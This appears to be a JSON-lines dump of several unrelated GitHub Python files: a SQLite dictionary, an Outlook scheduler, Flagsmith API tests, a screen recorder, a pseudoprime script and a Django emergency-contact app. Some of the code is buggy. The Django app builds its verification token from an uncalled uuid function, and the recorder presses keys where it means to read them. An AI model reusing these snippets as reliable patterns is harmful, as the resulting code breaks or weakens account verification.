SqLiteDictionary.__init__(self, filename, flag, mtn, autosync)\r\n self._orderby = \" ORDER BY ROWKEY \"\r\n\r\n#---------------------- bsddb.btree-compatilble additions ----------------------\r\n def _sc(self, c, x):\r\n if c is None:\r\n raise KeyError(\"%s key not found\"%x)\r\n c = tuple(str(i) for i in c)\r\n self._cursor = c\r\n return c\r\n\r\n def _step(self, key, cmp, dire):\r\n key = self._check_key(key)\r\n o = ''\r\n if '<' in cmp:\r\n o = 'DESC'\r\n c = None\r\n QUERY = (\"SELECT ROWKEY, ROWVAL FROM %s WHERE ROWKEY %s ? %s %s LIMIT 1\"\r\n %(self._mtn, cmp, self._orderby, o))\r\n for c in self._db.execute(QUERY, (key,)):\r\n break\r\n return self._sc(c, dire)\r\n\r\n def set_location(self, key):\r\n return self._step(key, '>=', 'Usable')\r\n\r\n def first(self):\r\n return self._step('', '>=', 'First')\r\n\r\n def next(self):\r\n if self._cursor is None:\r\n return self.first()\r\n return self._step(self._cursor[0], '>', 'Next')\r\n\r\n def last(self):\r\n for c, in self._db.execute(\"SELECT MAX(ROWKEY) FROM %s\"%self._mtn):\r\n return self._step(c, '<=', 'Last')\r\n return self._sc(None, 'Last')\r\n\r\n def previous(self):\r\n if self._cursor is None:\r\n return self.last()\r\n return self._step(self._cursor[0], '<', 'Previous')\r\n\r\nclass ShelveSqLiteDictionary(SqLiteDictionary):\r\n # put the heavy lifting for ArbitrarySqLiteDictionary here\r\n _allowed_keys = (str, buffer)\r\n @classmethod\r\n def _check_key(cls, key):\r\n if type(key) not in cls._allowed_keys:\r\n raise ValueError(\r\n \"Can only use (%s) instances as keys, not %r\"%\r\n (\", \".join(i.__name__ for i in cls._allowed_keys), type(key)))\r\n if type(key) is str:\r\n return buffer(key)\r\n return key\r\n\r\n # dump arbitrary data\r\n @staticmethod\r\n def _check_value(value):\r\n return buffer(cPickle.dumps(value))\r\n\r\n # load the data\r\n def __getitem__(self, key):\r\n return cPickle.loads(\r\n super(ShelveSqLiteDictionary, self).__getitem__(key))\r\n\r\n # fix the iterable keys\r\n def __iter__(self):\r\n QUERY = \"SELECT ROWKEY FROM %s %s\"%(self._mtn, self._orderby)\r\n for rowkey, in self._db.execute(QUERY):\r\n if type(rowkey) is buffer:\r\n yield str(rowkey)\r\n else:\r\n yield rowkey\r\n\r\n # fix the iterable values\r\n def iteritems(self):\r\n QUERY = \"SELECT ROWKEY, ROWVAL FROM %s %s\"%(self._mtn, self._orderby)\r\n for i,j in self._db.execute(QUERY):\r\n if type(i) is buffer:\r\n i = str(i)\r\n yield i, cPickle.loads(str(j))\r\n\r\nclass ArbitrarySqLiteDictionary(ShelveSqLiteDictionary):\r\n # only allow immutables as keys\r\n _allowed_keys = (str, buffer, unicode, int, float, type(None))\r\n\r\nclass Keys(object):\r\n # for Python 3.0's view object implementation\r\n __slots__ = '_parent',\r\n def __init__(self, parent):\r\n self._parent = parent\r\n\r\n def __len__(self):\r\n return len(self._parent)\r\n\r\n def __contains__(self, key):\r\n return key in self._parent\r\n\r\n def __iter__(self):\r\n return iter(self._parent)\r\n\r\n # view set operations\r\n def __and__(self, other):\r\n if type(other) not in (Keys, Items):\r\n return set(self) & set(other)\r\n if len(other) < len(self):\r\n self, other = other, self\r\n s = set()\r\n for i in self:\r\n if i in other:\r\n s.add(i)\r\n return s\r\n\r\n def __or__(self, other):\r\n s = set(self)\r\n s.update(other)\r\n return s\r\n\r\n def __sub__(self, other):\r\n if type(other) not in (Keys, Items):\r\n s = set(self)\r\n return s - set(other)\r\n s = set()\r\n for i in self:\r\n if i not in other:\r\n s.add(i)\r\n return s\r\n\r\n def __rsub__(self, other):\r\n if type(self) not in (Keys, Items):\r\n s = set(other)\r\n return s - set(self)\r\n s = set()\r\n for i in other:\r\n if i not in self:\r\n s.add(i)\r\n return s\r\n\r\n def __xor__(self, other):\r\n if (type(self) not in (Keys, Items)) or (type(other) not in (Keys, Items)):\r\n return set(self) ^ set(other)\r\n return (self-other) | (other-self)\r\n\r\nclass Values(Keys):\r\n def __contains__(self, value):\r\n return value in iter(self)\r\n def __iter__(self):\r\n return self._parent._itervalues()\r\n\r\nclass Items(Keys):\r\n def __contains__(self, kv_pair):\r\n if type(kv_pair) is not tuple or len(kv_pair) != 2:\r\n raise ValueError(\"Need 2-tuple to check item containment\")\r\n return self._parent.get(kv_pair[0], sentinel) == kv_pair[1]\r\n def __iter__(self):\r\n return self._parent._iteritems()\r\n","repo_name":"amuralle/pygr","sub_path":"contrib/benchmark/sq_dict.py","file_name":"sq_dict.py","file_ext":"py","file_size_in_byte":12241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37577501060","text":"\"\"\"\nCoordinates checking data releases for sites due, according to Outlook calendar.\n\nRun this script at the beginning of the day and it will end itself after\nchecking the last event in Outlook calendar.\n\"\"\"\nimport time\nimport json\nfrom datetime import datetime, timedelta\n\nimport schedule\n\nfrom data_releases import outlook, site_checking\n \n \ndef coordinate(event_details, tzone):\n \"\"\"\n If check is successful (or throws error) alert via Outlook Email and remove\n Outlook Calendar entry\n \"\"\"\n # Should {url,text_template,xpath} be stored somewhere other than the event?\n updated, response_info = site_checking.check_date_str(\n event_details['url'],\n event_details['text_template'],\n event_details['date_str'],\n xpath=event_details['xpath']\n )\n if updated:\n # detected a data release\n msg = \"\"\"\n Data released for \"{title}\" with date \"{date_str}\"\n \n Download from: {url}\n \n :^)\n \"\"\".format(**event_details)\n outlook.email_alert(msg, subject=\"Data Release Detected\")\n # remove calendar entry -- DISABLED FOR TESTING\n # outlook.cancel_event(covid_calendar, event_details['ical_uid'])\n # cancel retry-jobs\n schedule.clear(event_details['ical_uid'])\n elif len(schedule.get_jobs(event_details['ical_uid'])) == 0:\n # no more retries scheduled, move calendar event to next weekday\n if datetime.now(tzone).strftime('%A') == \"Friday\":\n days_to_add = 3\n else:\n days_to_add = 1\n outlook.move_event(covid_calendar, event_details['ical_uid'],\n days = days_to_add)\n elif updated is None:\n # error was thrown when checking site\n msg = \"\"\"\n Error was thrown when checking data release for {event_name}.\n (This event will not be automatically retried.)\n \n Error message: {response_info}\n \n Full event details:\n {event_details}\n \"\"\".format(event_details=event_details,\n response_info=response_info,\n event_name=event_details['title'])\n outlook.email_alert(msg, subject=\"Data Release Error\")\n # abandon retries for this event\n schedule.clear(event_details['ical_uid'])\n\n\ndef check_for_elapsed_events(next_day_info, tzone):\n # The events are sorted by datetime, so the first element is the next event\n next_event = next_day_info[0]\n next_dt = datetime.fromisoformat(next_event['release_dt'])\n if next_dt < datetime.now(tzone):\n # Event has elapsed so should be put on \"active\" status\n schedule.every(5).minutes.do(coordinate,\n event_details=next_event,\n tzone=tzone) \\\n .until(datetime.now(tzone) + timedelta(minutes=30)) \\\n .tag(next_event['ical_uid'])\n # ...and removed from \"pending\"\n if len(next_day_info) > 1:\n next_day_info = next_day_info[1:]\n else:\n # no more events to check for\n schedule.clear('main_job')\n \n return next_day\n\n\nif __name__ == \"__main__\":\n covid_calendar = outlook.get_covid_calendar()\n \n next_day = outlook.get_next_info(covid_calendar, 1)\n output = {\n 'next_dt': next_day[0]['release_dt'] if len(next_day) > 0 else None,\n 'calendar_id': covid_calendar.calendar_id,\n 'meta': \"\"\"\n Gives datetimes according to \"{tzone}\" timezone ({tzname}).\n \"\"\".format(tzone=outlook.DEFAULT_TZONE,\n tzname=outlook.DEFAULT_TZONE.tzname(datetime.now())),\n 'full_info': next_day\n }\n with open('../data/next_day.json', 'w') as f:\n json.dump(output, f)\n \n # Start running\n schedule.every(15).minutes.do(check_for_elapsed_events,\n next_day_info=next_day,\n tzone=outlook.DEFAULT_TZONE) \\\n .tag('main_job')\n \n while len(schedule.get_jobs()) > 0:\n schedule.run_pending()\n time.sleep(1)\n","repo_name":"xaviermiles/automation","sub_path":"data_releases/daily_run.py","file_name":"daily_run.py","file_ext":"py","file_size_in_byte":4103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9864090705","text":"from helper import num_bits, max_robot_add, int_to_bin_props\n\n\nadder_formula = \"\"\nfor i in range(2**num_bits):\n l = int_to_bin_props(i, \"p\", False)\n str = \"(!( \"\n for s in l:\n str = str + \"(\" + s +\") & \"\n str = str[:-3]\n str = str + \" ) | ( (\"\n for j in range(max_robot_add):\n res = (i+j) % (2**num_bits)\n l = int_to_bin_props(res, \"p\", True)\n for s in l:\n str = str + \"(\" + s +\") & \"\n str = str[:-3] + \" ) | (\"\n str = str[:-4] + \")) & \"\n adder_formula = adder_formula + str\nadder_formula = adder_formula[:-3]\n\n# goal_formula = \"\"\n# for i in range(num_bits):\n# goal_formula = goal_formula + \"(x{} = y{}) & \".format(i,i)\n# goal_formula = goal_formula[:-3]\n\n# formula = \"(G(\"+adder_formula+\")) & (F(\"+goal_formula+\"))\"\n\nformula = \"(G(\"+adder_formula+\")) & (F(\\\"robotturnwin\\\" | \\\"humanturnwin\\\"))\"\n\n\nprint(\"Pmax =? [\" + formula + \"];\")","repo_name":"andrewmw94/gandalf_2020_experiments","sub_path":"double_counter/print_formula.py","file_name":"print_formula.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33306555698","text":"import json\nfrom unittest.case import TestCase\n\nimport pytest\nfrom django.urls import reverse\nfrom rest_framework import status\nfrom rest_framework.test import APIClient\n\nfrom environments.models import Environment\nfrom integrations.new_relic.models import NewRelicConfiguration\nfrom organisations.models import Organisation, OrganisationRole\nfrom projects.models import Project\nfrom util.tests import Helper\n\n\n@pytest.mark.django_db\nclass NewRelicConfigurationTestCase(TestCase):\n def setUp(self):\n self.client = APIClient()\n user = Helper.create_ffadminuser()\n self.client.force_authenticate(user=user)\n\n self.organisation = Organisation.objects.create(name=\"Test Org\")\n user.add_organisation(\n self.organisation, OrganisationRole.ADMIN\n ) # admin to bypass perms\n\n self.project = Project.objects.create(\n name=\"Test project\", organisation=self.organisation\n )\n self.environment = Environment.objects.create(\n name=\"Test Environment\", project=self.project\n )\n self.list_url = reverse(\n \"api-v1:projects:integrations-new-relic-list\", args=[self.project.id]\n )\n\n def test_should_create_new_relic_config_when_post(self):\n # Given setup data\n data = {\n \"base_url\": \"http://test.com\",\n \"api_key\": \"key-123\",\n \"app_id\": \"app-123\",\n }\n\n # When\n response = self.client.post(\n self.list_url,\n data=json.dumps(data),\n content_type=\"application/json\",\n )\n\n # Then\n assert response.status_code == status.HTTP_201_CREATED\n # and\n assert NewRelicConfiguration.objects.filter(project=self.project).count() == 1\n\n def test_should_return_BadRequest_when_duplicate_new_relic_config_is_posted(self):\n # Given\n NewRelicConfiguration.objects.create(\n base_url=\"http://test.com\",\n api_key=\"key-123\",\n app_id=\"app-123\",\n project=self.project,\n )\n data = {\n \"base_url\": \"http://test.com\",\n \"api_key\": \"key-123\",\n \"app_id\": \"app-123\",\n }\n\n # When\n response = self.client.post(\n self.list_url,\n data=json.dumps(data),\n content_type=\"application/json\",\n )\n\n # Then\n assert response.status_code == status.HTTP_400_BAD_REQUEST\n assert NewRelicConfiguration.objects.filter(project=self.project).count() == 1\n\n #\n def test_should_update_configuration_when_put(self):\n # Given\n config = NewRelicConfiguration.objects.create(\n base_url=\"http://test.com\",\n api_key=\"key-123\",\n app_id=\"app-123\",\n project=self.project,\n )\n\n api_key_updated = \"new api\"\n app_id_updated = \"new app\"\n data = {\n \"base_url\": config.base_url,\n \"api_key\": api_key_updated,\n \"app_id\": app_id_updated,\n }\n\n # When\n url = reverse(\n \"api-v1:projects:integrations-new-relic-detail\",\n args=[self.project.id, config.id],\n )\n response = self.client.put(\n url,\n data=json.dumps(data),\n content_type=\"application/json\",\n )\n config.refresh_from_db()\n\n # Then\n assert response.status_code == status.HTTP_200_OK\n assert config.api_key == api_key_updated\n assert config.app_id == app_id_updated\n\n def test_should_return_new_relic_config_list_when_requested(self):\n # Given - set up data\n\n # When\n response = self.client.get(self.list_url)\n\n # Then\n assert response.status_code == status.HTTP_200_OK\n\n def test_should_remove_configuration_when_delete(self):\n # Given\n config = NewRelicConfiguration.objects.create(\n base_url=\"http://test.com\",\n api_key=\"key-123\",\n app_id=\"app-123\",\n project=self.project,\n )\n # When\n url = reverse(\n \"api-v1:projects:integrations-new-relic-detail\",\n args=[self.project.id, config.id],\n )\n res = self.client.delete(url)\n\n # Then\n assert res.status_code == status.HTTP_204_NO_CONTENT\n # and\n assert not NewRelicConfiguration.objects.filter(project=self.project).exists()\n","repo_name":"Flagsmith/flagsmith","sub_path":"api/integrations/new_relic/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":4434,"program_lang":"python","lang":"en","doc_type":"code","stars":3272,"dataset":"github-code","pt":"31"} +{"seq_id":"13632202532","text":"from statistics import mode\nfrom django.db import models\nfrom user.models import User\n\nclass Categories(models.Model):\n\n category_name = models.CharField(max_length=100)\n description = models.CharField(max_length=500)\n is_active = models.BooleanField(default=True)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n class Meta:\n verbose_name_plural = \"categories\"\n\n def __str__(self):\n return str(self.category_name)","repo_name":"sanket8088/drf-ecommerce","sub_path":"ecommerce/products/models/categories.py","file_name":"categories.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6018259579","text":"import time\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ndef sieve_of_eratosthenes(limit):\r\n primes = [True] * (limit + 1)\r\n primes[0] = primes[1] = False\r\n for num in range(2, int(limit**0.5) + 1):\r\n if primes[num]:\r\n for multiple in range(num * num, limit + 1, num):\r\n primes[multiple] = False\r\n return [num for num, is_prime in enumerate(primes) if is_prime]\r\n\r\n\r\ndef is_psp(num, base, prime):\r\n exp = num - 1\r\n while exp % prime != 0:\r\n exp += num - 1\r\n return pow(base, exp // prime, num) == 1\r\n\r\n\r\ndef pomerance_algorithm(limit):\r\n primes = sieve_of_eratosthenes(limit)\r\n result = []\r\n for num in range(2, limit):\r\n is_psp_2 = all(is_psp(num, 2, prime) for prime in primes)\r\n is_psp_3 = all(is_psp(num, 3, prime) for prime in primes)\r\n if is_psp_2 and is_psp_3:\r\n result.append(num)\r\n return result\r\n\r\n\r\nlimits = [10**6 ,10**8] # Разные лимиты для анализа времени выполнения\r\n\r\nfor i in limits:\r\n psp_numbers = pomerance_algorithm(i)\r\n print(f\"PSP numbers less than {i}: {psp_numbers}\")\r\nexecution_times = []\r\n\r\nfor limit in limits:\r\n start_time = time.time()\r\n psp_numbers = pomerance_algorithm(limit)\r\n end_time = time.time()\r\n execution_times.append(end_time - start_time)\r\n print(f\"PSP numbers less than {limit}: {len(psp_numbers)}\")\r\n\r\n# Построение графика времени выполнения\r\nplt.figure(figsize=(8, 6))\r\nplt.plot(limits, execution_times, marker='o', color='b', linestyle='-', linewidth=2, markersize=8)\r\nplt.xlabel('Number Limit')\r\nplt.ylabel('Execution Time (seconds)')\r\nplt.title('Execution Time vs. Number Limit')\r\nplt.grid(True)\r\nplt.show()\r\n","repo_name":"markiriy/pomerance-algorithm","sub_path":"pomerances.py","file_name":"pomerances.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10584114939","text":"import cv2\nimport numpy as np\nimport pyautogui\nimport time\n\n# Define the codec and create VideoWriter object\nfourcc = cv2.VideoWriter_fourcc(*'XVID')\nout = cv2.VideoWriter('output.avi', fourcc, 20.0, (1920, 1080))\n\n# Define a function to get the pressed keys\ndef get_pressed_keys():\n keys = []\n for key_name in [\"left\", \"right\", \"up\", \"down\", \"space\"]:\n if pyautogui.keyDown(key_name):\n keys.append(key_name)\n return keys\n\n# Define the main function\ndef record_game():\n # Wait for 5 seconds before starting\n time.sleep(5)\n while True:\n # Take a screenshot of the screen\n screenshot = pyautogui.screenshot()\n # Convert the screenshot to an array and resize it\n frame = np.array(screenshot)\n frame = cv2.resize(frame, (1920, 1080))\n # Get the pressed keys\n keys = get_pressed_keys()\n # Write the keys on the frame\n text = \"Keys: \" + \" \".join(keys)\n cv2.putText(frame, text, (50, 50), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 2)\n # Write the frame to the video\n out.write(frame)\n # Exit the loop if the 'q' key is pressed\n if cv2.waitKey(1) == ord('q'):\n break\n\n# Call the main function\nrecord_game()\n\n# Release everything\nout.release()\ncv2.destroyAllWindows()\n","repo_name":"Siranial/PlayAI","sub_path":"Scrapped/Data_Collection/Frame_Capture/gpt_framecap.py","file_name":"gpt_framecap.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35590788114","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n Extra For field:\n\n JSONField\n\"\"\"\n\nimport json\n\nfrom django.forms import Field, ValidationError\n\n\nclass JSONField(Field):\n \"\"\"\n Принимает на вход строку с JSON. Преобразует ее в объект.\n \"\"\"\n\n def to_python(self, value):\n \"\"\"\n Validates that the input is a decimal number. Returns a Decimal\n instance. Returns None for empty values. Ensures that there are no more\n than max_digits in the number, and no more than decimal_places digits\n after the decimal point.\n \"\"\"\n #django.core.serializers.json.DjangoJSONEncoder\n\n if value in self.empty_values:\n return None\n\n try:\n return json.loads(value)\n except Exception as e:\n raise ValidationError(repr(e), code='invalid')\n","repo_name":"Alex-vz/django-easy-vue2","sub_path":"easy_vue/dj_form.py","file_name":"dj_form.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30428745451","text":"from django.shortcuts import render, redirect\nfrom django.views.generic import TemplateView\nfrom django.contrib.messages.views import SuccessMessageMixin\nfrom django.views.generic.edit import CreateView\nfrom django.urls import reverse_lazy\nfrom django.http import HttpResponse\nfrom django.http import HttpResponseRedirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib import messages\nfrom .models import Contact, Profile\nfrom django.urls import reverse\nfrom django.core.validators import validate_email\nfrom django.core.exceptions import ValidationError\nfrom django.core.mail import send_mail\nfrom django.http import JsonResponse\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.conf import settings\nfrom django.core.mail import send_mail, EmailMessage\nfrom django.shortcuts import render\nfrom django.template.loader import render_to_string\nimport json\nimport uuid\n\n####################################################\n\n\nclass MainView(TemplateView):\n template_name = 'emnosys/main.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['css_file'] = 'styles.css'\n return context\n\n\n######################################################\n\n\ndef RegistrationView(request):\n if request.method == \"POST\":\n username = request.POST['username']\n email = request.POST['email']\n password1 = request.POST['password1']\n\n myuser = User.objects.create_user(username, email, password1)\n myuser.save()\n\n profile_obj = Profile.objects.create(user=myuser, token=str(uuid.uuid4))\n profile_obj.save()\n\n SendVerificationEmailView(email, profile_obj.token)\n\n return redirect('/token')\n\n return render(request, 'emnosys/registration.html', {'request': request})\n\n\n###############################################\n\n\ndef TokenSendView (request):\n return render(request , 'emnosys/send_token.html')\n\n\n###############################################\n\n\ndef VerificationView(request, token):\n try:\n profile_obj = Profile.objects.filter(token=token).first()\n if profile_obj:\n profile_obj.is_verified = True\n profile_obj.save()\n messages.success(request, 'Your account has been verified')\n return redirect('/signin')\n else:\n\n messages.error(request, 'Invalid token or profile not found')\n return redirect('/error')\n except Exception as e:\n\n print(e)\n return redirect('/error')\n\n\n###################################################\n\n\ndef SendVerificationEmailView(email,token):\n subject = \"Your account needs to be verified\"\n message = 'Hi, use that link to verify your account \\n http://127.0.0.1:8000/verify/' + token\n email_from = settings.EMAIL_HOST_USER\n recipient_list = [email]\n send_mail(subject, message , email_from ,recipient_list)\n\n\n###############################################\n\n\ndef SigninView(request):\n\n if request.method == 'POST':\n username = request.POST['username']\n password1 = request.POST['pass1']\n\n user = authenticate(username=username, password=password1)\n\n if user is not None:\n login(request, user)\n return render(request, \"emnosys/main.html\")\n else:\n return redirect('signin')\n return render(request, \"emnosys/signin.html\")\n\n################################################\n\ndef SignoutView(request):\n logout(request)\n return redirect('home')\n\n######################################################\n\n\nclass PersonalPageView(TemplateView):\n template_name = 'emnosys/personalpage.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['css_file'] = 'styles.css'\n return context\n\n####################################################\n\n@login_required\ndef ContactCreateView(request):\n if request.method == 'POST':\n username = request.POST.get('username')\n message = request.POST.get('textarea')\n email = request.POST.get('email')\n if not all([username, message, email]):\n return render(request, 'emnosys/addcontacts.html')\n try:\n validate_email(email)\n except ValidationError:\n return render(request, 'emnosys/addcontacts.html')\n contact = Contact(username=username, message=message, email=email, contactowner=request.user)\n contact.save()\n return HttpResponseRedirect(reverse('personalpage'))\n return render(request, 'emnosys/addcontacts.html')\n\n\n##################################\n\n\ndef CreateListOfContacts(request):\n username = request.user.username\n all_contacts = Contact.objects.filter(contactowner__username=username)\n return all_contacts\n\n\n##################################\n\n\ndef SendEmailView(request):\n all_contacts = CreateListOfContacts(request)\n for cntct in all_contacts:\n personalized_message = cntct.message\n email = EmailMessage(\n 'Someone used our application to send you this emergency message!',\n personalized_message,\n 'emnosy.wqrfl@gmail.com',\n [cntct.email],\n )\n email.content_subtype = 'html' # Set the content type to HTML\n email.send(fail_silently=False)\n\n return redirect('/')\n\n\n##################################\n\n\ndef CreateJsonWithNamesView():\n users = User.objects.all()\n for i, user in enumerate(users, start=1):\n data['user' + i] = {\n 'username': user.username\n }\n json_data = json.dumps(data)\n return HttpResponse(json_data, content_type='application/json')\n\n\n#######################################################################\n# ⠄⠄⠄⠄⠄⡇⠄⠄⠄⠄⠄⢠⡀⠄⠄⢀⡬⠛⠁⠄⠄⠄⠄⠄⠄⠄⠉⠻⣿⣿⣿⣽⣿⣿⣿⣿⣿⣿⣿⣿⣧⠄⠄⠙⢦\n# ⠄⠄⠄⠄⠄⡇⠄⠄⠄⠄⢰⠼⠙⢀⡴⠋⠄⠄⠄⠄⠄⠄⠄⠄⠄⡠⠖⠄⠄⠙⠿⢿⣿⣿⣿⣿⣿⣿⣿⣿⣯⣀⡀⠄⠄⠄⡀\n# ⠄⠄⠄⠄⠄⡇⠄⠄⠄⠄⠄⠄⡴⠋⠄⠄⠄⠄⠄⠄⠄⠄⠄⢠⠞⠄⠄⠄⠄⠄⠄⠄⠄⠄⠉⠉⠉⠙⠋⠙⠋⠙⠻⠦⠤⣤⣼⣆⣀⣀⣀⣀⡀\n# ⠄⠄⠄⠄⠄⢷⠄⠄⠄⠄⢠⠞⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⡰⠃⡄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠉⠉⠉\n# ⠄⠄⠄⠄⠄⢸⡀⠄⠄⢠⠏⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⣰⠁⣸⠁⠄⠄⠄⠄⠄⠄⠄⠄⢀⠄⠄⡄\n# ⠄⠄⠄⠄⠄⢀⣧⠄⢠⠏⠄⠄⠄⠄⠄⠄⠄⠄⠄⢀⢾⠃⡜⡿⠄⠄⠄⠄⠄⠄⠄⠄⣠⠋⢀⣼⠁⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠸⢾⣀⣠\n# ⠄⠄⠄⢀⣠⢌⣦⢀⡏⠄⡄⠄⠄⢠⠃⠄⠄⠐⣶⡁⡞⡼⠄⣇⠄⠄⠄⠄��⠄⠄⡴⠁⢠⠎⢸⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⢈⠝⠁\n# ⠄⢀⠞⠉⠄⠄⠹⡼⠄⣼⠁⠄⠄⡏⠄⠄⢀⡞⠄⠈⣷⠇⠄⢻⠄⠄⠄⠄⠄⢐⣞⣀⣰⣃⣀⣸⠄⢀⠇⠄⠄⠄⠄⠄⠄⠄⠄⠄⠁⠄⠄⠄⠄⠄⢀\n# ⢰⠋⠄⠄⠄⠄⢀⡇⢠⡏⠄⠄⢸⠄⠄⢀⠎⠄⠄⠄⡇⠄⠄⢸⡀⠄⠄⠄⢠⢾⢁⡜⠁⠄⠄⢸⠄⣸⠄⠄⠄⠄⠄⠄⡀⠄⠄⠄⠄⠄⠄⠄⢀⡴⠃\n# ⡞⠄⠄⠄⠄⠄⢸⠄⡞⡷⠄⠄⡟⠄⢘⡟⠛⠷⠶⣤⣅⠄⠄⠄⣇⠄⠄⢠⠋⡧⠊⠄⠄⠄⠄⢸⢀⠇⠄⠄⠄⠄⠄⢰⠁⠄⠄⠄⠄⠄⢀⡴⠋\n# ⢹⠄⠄⠄⠄⠄⡾⢰⠃⡇⠄⠄⡇⠄⡜⢀⣠⣤⠶⠞⠛⠁⠄⠄⠘⡄⡰⠃⠘⠱⣾⣟⡛⠛⠛⠛⡟⠂⠄⠄⠄⠄⠄⡎⠄⠄⠄⠄⣀⠴⡋\n# ⠈⢳⠄⠄⠄⠄⡇⡼⠄⢻⠄⢠⡇⢸⠁⠈⠁⠄⠄⠄⠄⠄⠄⠄⠄⠈⠁⠄⠄⠄⠄⠙⠿⣶⣄⡰⠇⠄⠄⠄⠄⠄⡼⠄⠄⠄⡠⢾⣿⣆⢳\n# ⣀⣬⠿⠷⠦⠤⣷⣇⡠⠾⡄⢸⣇⢸⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⢹⠛⠂⠄⠄⠄⠄⣰⠁⠄⣀⣬⣷⠞⠛⠙⠛⢧⣤⣀\n# ⠉⠄⠄⠄⠄⠄⢻⠄⠄⠄⢧⢸⢸⠘⡇⠄⠄⠄⠄⠄⠄⠄⠄⣠⠄⠄⠄⠄⠄⠄⠄⠄⠄⢠⠃⠄⠄⠄⠄⠄⣰⠃⣶⢉⠜⠋⠄⠄⠄⠄⠄⠄⠄⠈⢳\n# ⠄⠄⠄⢀⣤⡀⢸⠄⠄⠄⠈⢿⠄⠄⣿⣆⠄⠄⠄⠄⠄⠄⠄⡟⣧⠄⠄⠄⠄⠄⠄⠄⡴⠃⠄⠄⠄⡠⠊⡰⡗⠋⡰⡼⠃⠄⠄⠄⠄⠄⠄⠄⠄⠄⢨\n# ⠄⢀⡔⠉⠄⠙⢦⠄⠄⠄⠄⢸⡀⢰⡏⠈⠳⣄⠄⠄⠄⠄⠄⠉⠁⠄⠄⠄⠄⠄⢀⡞⠁⠄⢀⣤⠎⠄⡔⣡⠃⢰⡇⣹⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⢼\n# ⣰⠋⠄⢀⣴⣖⠒⠓⡆⠄⠄⠈⣇⣿⣿⠄⢸⠹⡷⢄⠄⠄⠄⠄⠄⠄⠄⠄⠄⣠⠋⠄⢀⣴⣿⠏⠠⠊⣴⡏⢠⢻⡇⢹⡆⠄⠄⠄⠄⠄⣷⠄⠄⣰⠋\n# ⡇⠄⣰⣿⣿⣿⠒⠋⣛⣄⠄⠄⣹⢸⠈⢧⠸⡄⠹⣄⠙⠶⢶⣶⣶⣶⣶⡶⢾⠃⠄⡴⢋⡾⠋⣀⡴⣞⡝⡰⠃⠄⡇⡸⠉⠳⣄⣀⣀⣀⣿⣦⠞⠁\n# ⢷⢰⣿⣿⣿⣿⠄⠈⠁⠈⡇⠄⡏⢸⠄⠈⠓⢧⣀⣈⣤⡤⠖⠛⠉⠁⠄⢡⠃⢠⡞⠓⠚⠓⠚⣳⡞⠈⠘⠁⠄⠄⢹⡇⠄⠄⠄⠈⠉⠁⠸⣷⣀⣀⣀\n# ⢸⣿⣿⣿⣿⣿⠄⣿⣁⠜⠁⢸⡇⢸⣄⣀⡀⠘⢦⡀⠄⠄⠄⠄⠄⠄⢀⠏⡴⡻⠄⠄⠄⠠⣎⠹⡄⠄⢀⣀⣤⣤⣀⠁⠄⠄⠄⠄⠄⠄⠄⠈⢻⣿⣿\n# ⢸⣿⣿⣿⣿⣿⡇⢸⠄⠄⢀⡴⡇⠈⡇⠈⣩⠗⠒⣵⠆⠄⠄⠄⠄⠄⢸⡞⢰⠃⢀⠄⣀⡰⠟⠒⠒⡿⠉⠄⠄⠄⠈⠑⣄⠄⠄⠄⠄⠄⠄⠄⠈⢿⣿\n# ⣿⣿⣿⣿⣿⣿⣷⠎⠄⢠⠏⠄⠹⣄⢣⢠⠃⠄⠄⢤⠤⠄⠄⠠⠤⢶⡏⠄⡎⢠⠞⠋⠁⠄⠄⠄⣸⠁⠄⠄⠄⠄⠄⠄⠈⣧⠄⠄⠄⠄⠄⠄⠄⠄⠻\n# ⣿⣿⣿⣿⣿⣿⣃⡀⢠⠏⠄⠄⠄⠄⣨⠇⠄⣠⠴⠚⠁⠄⠄⠄⠄⠈⡇⢰⠃⠄⠄⠄⠄⠄⠄⢰⠇⠄⠄⠄⠄⠄⠄⠄⠄⢹⡀\n# ⣿⣿⣿⣿⣿⡿⢉⣇⡎⠄⠄⠄⠄⢰⠇⠄⢨⠇⠄⠄⠄⠄⠄⠄⠄⠄⠘⢾⡀⠄⠄⠄⠄⠄⠄⡞⢀⠄⠄⠄⠄⠄⠄⠄⠄⢸⡇\n\n","repo_name":"YukkieWQR/emnosys_wqrfl","sub_path":"emnosys/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} 